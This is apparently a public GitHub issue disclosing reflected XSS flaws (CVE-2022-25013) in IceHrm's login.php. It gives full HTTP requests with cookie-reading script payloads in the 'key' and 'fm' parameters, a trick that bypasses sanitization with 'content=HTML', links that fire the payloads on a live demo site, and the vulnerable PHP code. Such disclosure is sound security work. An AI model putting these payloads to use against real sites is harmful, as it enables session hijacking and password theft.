Headline
CVE-2022-25013: Reflected XSS vulnerabilities in login.php -- can be used to leak passwords · Issue #284 · gamonoid/icehrm
Ice Hrm 30.0.0.OS was discovered to contain multiple reflected cross-site scripting (XSS) vulnerabilities via the “key” and “fm” parameters in the component login.php.
Important note :
This vulnerability was reported to the maintainers on Nov 23rd, 2021, and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively.
Description
DOM XSS in login.php GET parameter key.
The input to key GET parameter is unsanitized as required for the context (javascript context ), and gets reflected in the DOM.
Proof of Concept****Occurrence 1 : Request param key
Request:
GET /login.php?key=%27;alert(document.cookie)// HTTP/1.1
Host: icehrmpro.gamonoid.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Alt-Used: icehrmpro.gamonoid.com
Connection: keep-alive
Cookie: PHPSESSID=6jua1ee8xx4s4cqcl3xxx9itr7;
Upgrade-Insecure-Requests: 1
Follow the link : https://icehrmpro.gamonoid.com/login.php?key=%27;alert(document.cookie)// to test this vulnerability on the live demo version of the website.
Occurence 2 : Request param fm
The payload passed fm gets sanitized by PHP code. This could be bypassed by adding an extra GET param content with the value HTML. Thus backend will not sanitize any user input.
GET /login.php?f=boo&fm=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&content=HTML HTTP/1.1
Host: icehrmpro.gamonoid.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Alt-Used: icehrmpro.gamonoid.com
Connection: keep-alive
Cookie: PHPSESSID=6jua1ee8qu4s4cqcl3gqm9itr7; _ga=GA1.2.267929257.1637661597; _gid=GA1.2.561894500.1637661597
Upgrade-Insecure-Requests: 1
Follow the link : https://icehrmpro.gamonoid.com/login.php?f=boo&fm=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&content=HTML to test this vulnerability on the live demo version of the website.
Impact
This vulnerability is capable of script execution on the victim’s browser.
It’s possible to run a keylogger script and capture password of the victim user who tries to login by typing in thier credentials.
References
https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting
Occurrences
HTML sanitization can be bypassed with an extra content=HTML GET param
https://github.com/gamonoid/icehrm/blob/master/core/login.php#L357-L361
<script type="text/javascript">
var key = "";
<?php if (isset($_REQUEST[‘key’])) {?>
key = '<?=$_REQUEST[‘key’]?>’;
key = key.replace(/ /g,"+");
<?php }?>
</script>